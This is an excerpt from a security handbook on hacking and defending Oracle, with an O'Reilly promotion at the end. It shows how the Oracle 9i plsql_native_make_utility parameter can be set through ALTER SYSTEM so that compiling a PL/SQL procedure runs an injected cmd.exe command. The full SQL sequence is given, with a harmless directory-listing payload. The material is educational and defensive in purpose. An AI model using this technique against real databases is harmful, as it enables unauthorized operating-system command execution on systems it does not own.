10.5. Running OS Commands Using ALTER SYSTEM
This next example is a bit of a "hack" and was never intended by Oracle as a proper method for running commands but it works well. In Oracle 9i it is possible to manipulate the way Oracle compiles native PL/SQL programs. This is done by providing the name of a make program. Clearly, this can be abused to run OS commands:
ALTER SYSTEM SET plsql_native_make_utility = 'cmd.exe /C dir > c:\ooops.txt &'; ALTER SYSTEM SET plsql_native_make_file_name = ' foo'; ALTER SYSTEM SET plsql_native_library_dir='bar'; CREATE OR REPLACE PROCEDURE ohoh AS BEGIN NULL; END; / show errors
When Oracle compiles the ohoh procedure, Oracle executes the following:
cmd.exe /C dir > c:\ooops.txt & -f foo bar/RUN_CMD__SYSTEM__0.DLL
Oracle 10g deprecated the plsql_native_make_utility parameter.
Get The Oracle® Hacker's Handbook: Hacking and Defending Oracle now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.